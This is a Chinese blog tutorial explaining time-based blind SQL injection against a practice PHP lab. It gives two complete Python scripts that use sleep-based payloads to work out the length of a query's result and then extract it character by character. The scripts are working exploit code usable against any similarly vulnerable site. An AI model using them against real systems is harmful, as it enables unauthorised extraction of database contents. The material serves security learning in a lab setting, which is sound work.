Python 安全开发 时间盲注脚本

已于 2022-02-14 11:15:35 修改
阅读量1.3k 收藏 6
点赞数 2
分类专栏: Python学习 文章标签: 安全漏洞
于 2021-10-26 21:01:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/120980524
版权

时间盲注

0x00 时间盲注原理

时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用
’ and sleep(5) --+ 发现 页面响应超过5秒

用到的函数有

sleep(5) 延时函数 延迟5秒
if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep(5),为假执行1
length(str) 返回str字符串的长度
ascii(str) 返回str字符串的ascii编码
substr(str,start,len) 返回str字符串从start位开始len长度的字符串

if(length(($SQL)) = x , s l e e p ( 5 ) , 1 ) i f ( a s c i i ( s u b s t r ( ( x, sleep(5),1) if(ascii(substr(( x,sleep(5),1)if(ascii(substr((SQL),$x,1)) = $y,sleep(5),1)

流程

length($sql_exp)= $x 依次判断出 查询出的长度

if(ascii(substr((%s),%d,1))>%f,sleep(3),1)" % (exp, i, mid ) 依次判断出要查询的每位的ascii值

0x01脚本编写 (请求少,费时多)

以开普勒php开源靶场为例

  • 下载地址

      https://github.com/admin360bug/PHP

1.1用到的库

requests
有waf 还可以加 time

import requests

1.2判断页面响应

根据页面响应判断
有三种响应
登录成功 关键词 “login ok,success…”
登录失败 关键词 “登录失败”
空页面情况,其他情况

def check_res(res):
    if  res.elapsed.seconds > 2 :
        return True
    else:
        return False

1.3判断返回字符串长度

因为不知道执行次数,就用while True循环(死循环),直到 sql语句执行失败的长度的临界值就为要查询的内容的长度
eg:
length(select version()) > 1 为True

length(select version()) > 5 为False
进入 if not check_res(res) 为真, break 终止while死循环。 得到 length 为 5

def res_length(exp):
    length = -1
    sess = requests.session()

    while True:
        sql_exp = "if(length((%s)) = %d ,sleep(3),1)" % (exp, length)
        url = "http://www.bachang.com/index.php/Home/Index/SQL_three?id=2' and %s --+" % (sql_exp)
        res = sess.get(url)
        #print(res.url)
        #print(res.elapsed.seconds)
        if check_res(res) :
            break
        length += 1
    return length

1.4 获取查询结果

通过二分法提高查询效率
eg: 以版本号 首尾为 5 测试 ascii(5)=53
在这里插入图片描述

先比较(0+127) 如果成立,比较 (63+127) //2 = 95 ,如果不成立 比较 (0+63)//2 = 31 依次类推

def res_result(exp,length):
    result = ""
    sess = requests.session()

    for i in range(length):
        left = 0
        right = 127
        while True:
            mid = (left+right) // 2
            print(i)
            if mid == left :
                result += chr(right)
                break
            sql_exp = "if(ascii(substr((%s),%d,1))>%f,sleep(3),1)" % (exp, i+1, mid )
            url = "http://www.bachang.com/index.php/Home/Index/SQL_three?id=2' and %s --+" % (sql_exp)
            res = sess.get(url)

            if check_res(res):
                left = mid
            else:
                right = mid

    return result

1.5 主函数

写一个 while 循环 一直 可以输入命令

if __name__ == '__main__':
    while True:
        exp= input(">>>请输入SQL语句:")
        length = res_length(exp)
        print("[+]length:%s " % (length))
        result = res_result(exp,length)
        print("[+]result:%s" % (result))

在这里插入图片描述

0x02 脚本编写(请求多,费时少)

区别在于:获取结果部分 没有用二分法,直接挨个暴力猜解的。

import requests

def check_res(res):
    if  res.elapsed.seconds > 2 :
        return True
    else:
        return False

def res_length(exp):
    length = -1
    sess = requests.session()

    while True:
        sql_exp = "if(length((%s)) = %d ,sleep(3),1)" % (exp, length)
        url = "http://www.bachang.com/index.php/Home/Index/SQL_three?id=2' and %s --+" % (sql_exp)
        res = sess.get(url)
        #print(res.url)
        #print(res.elapsed.seconds)
        if check_res(res) :
            break
        length += 1
    return length

def res_result(exp,length):
    result = ""
    sess = requests.session()

    for i in range(length):
        for ascii in range(128):
            sql_exp = "if(ascii(substr((%s),%d,1)) = %f,sleep(3),1)" % (exp, i+1, ascii )
            url = "http://www.bachang.com/index.php/Home/Index/SQL_three?id=2' and %s --+" % (sql_exp)
            res = sess.get(url)
            if check_res(res):
                result += chr(ascii)
                break
    return result


if __name__ == '__main__':
    while True:
        exp= input(">>>请输入SQL语句:")
        length = res_length(exp)
        print("[+]length:%s " % (length))
        result = res_result(exp,length)
        print("[+]result:%s" % (result))
LuckyCharm~
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(4)SQL注入实战:时间盲注
午夜安全
10-02 8159
《WEB安全渗透测试》(4)SQL注入实战:时间盲注 时间盲注:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。1)考虑使用时间盲注访问URL:http://www.tianchi.com/web/time.php?id=1返回yes......
python.zip
08-01
在这个"python.zip"压缩包中,我们找到了一个与SQL盲注相关的基础操作脚本,这是网络安全领域的一个重要话题。SQL盲注(SQL Injection Blind)是攻击者通过探测系统对特定SQL查询的响应来判断数据库信息的一种攻击...
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1611
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
sql注入之时间盲注脚本(python)
npu2022303155的博客
03-31 249
之前看到一个布尔盲注脚本,感觉和时间盲注的逻辑差不多,只是判断条件变化了一下,基本没变化。所以就该了一下脚本。自己第一次做题,脚本跑出来了flag,但是错了中间的一个字符,猜测是时间延迟太小的原因。只是自己用sqlmap找出flag提交后,环境就关闭了,没验证过这个想法。但还是浅浅的记录一下吧。
2024年网络安全最新超硬核,SQL注入之时间盲注,原理+步骤+实战思路
最新发布
2401_84252281的博客
05-02 233
如果页面响应时间超过5秒,说明长度判断正确(sleep(5));如果页面响应时间不超过5秒(正常响应),说明长度判断错误,继续递增判断长度。
超硬核,SQL注入之时间盲注,原理+步骤+实战思路
热门推荐
wangyuxiang946的博客
04-15 1万+
延时注入,什么是时间盲注时间盲注原理?时间盲注使用步骤?时间盲注使用场景?时间盲注Python脚本
用py写一个时间盲注脚本(初学向)
qq_62540010的博客
02-06 3455
用py写一个时间盲注脚本 1. 首先我们要清楚时间盲注的特点是利用了sql中sleep这个函数,借助的是响应时间不同来判断构造语句的对错,那么我们主要思路就要通过记录响应时间来执行一系列操作,下面是我写的一个简单脚本 2. import requests import time for i in range(1,20): url="http://127.0.0.1/sqli/Less-9/?id=1'and if(length(database())={i},1,sleep(5))--+"
时间盲注python脚本.zip
12-28
总的来说,时间盲注python脚本是学习和研究SQL注入漏洞的一种工具,它可以帮助我们理解时间盲注的工作原理,提升安全意识,并在合适的环境中进行安全测试。在实际开发中,我们应该充分考虑安全性,防止此类漏洞的...
python连接sqlserver数据库自己写的盲注sqlserver的python脚本
04-24
Python是一种广泛使用的编程语言,尤其在数据处理和Web开发领域。在给定的场景中,我们关注的是如何使用Python连接到SQL Server数据库并执行盲注(Blind SQL Injection)操作。下面将详细介绍这个过程。 首先,让...
基于python的Web渗透(内含源码和实验报告).zip
12-11
首先,你需要了解SQL注入的基本概念和类型,如盲注时间延迟注入等。然后,通过构造特定的查询字符串,利用Python的requests库发送请求到目标服务器,观察响应以判断是否存在注入漏洞。最后,可以结合sqlmap工具...
SqlMap注入神器免Python安装版
05-20
它可以帮助安全研究人员或渗透测试者在不熟悉Python环境的情况下快速进行SQL注入攻击测试。SqlMap的免Python版本特别为那些无法或不想安装Python环境的用户设计,尤其适用于Windows操作系统。 SqlMap的工作原理基于...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
时间盲注(延迟注入)
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
渗透测试——sql注入进阶/基于时间盲注/一看就会/
ChenD的学习笔记
10-06 1768
基于时间盲注
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2407
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
python-----实现接口自动化测试(实例4)
diemaifou6059的博客
08-10 218
实现接口自动化测试1、读取case---从测试用例Excel表格中读取接口请求数据2、调用接口---发送请求获取实际结果3、校验结果---实际结果与预期结果对比4、结果写入表格---将实际结果与测试状态填入Excel表格5、生成报告---发送邮件 目录划分 1、bin--start 2cases--测试用例 3config---setting(邮件连接、路径) 4lib...
构造exp-Python盲注脚本
告白的博客
08-12 453
0x00 搭建环境介绍 平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。 利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造盲注exp,实现注入 手工注入测试: 0x01 利用python构造exp-盲注脚本 import requests def get_html(url): "我的功能判断页面内容是否
python脚本之布尔盲注
ro4lsc的博客
04-21 7130
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3207
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
那我怎么用python写一个盲注脚本
03-07
你可以使用 Python 编写一个盲注脚本,具体实现方法可以参考以下步骤: 1. 构造 SQL 注入语句,例如:SELECT * FROM users WHERE username='admin' AND password='123' OR 1=1; 2. 利用 Python 的 requests 库发送...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值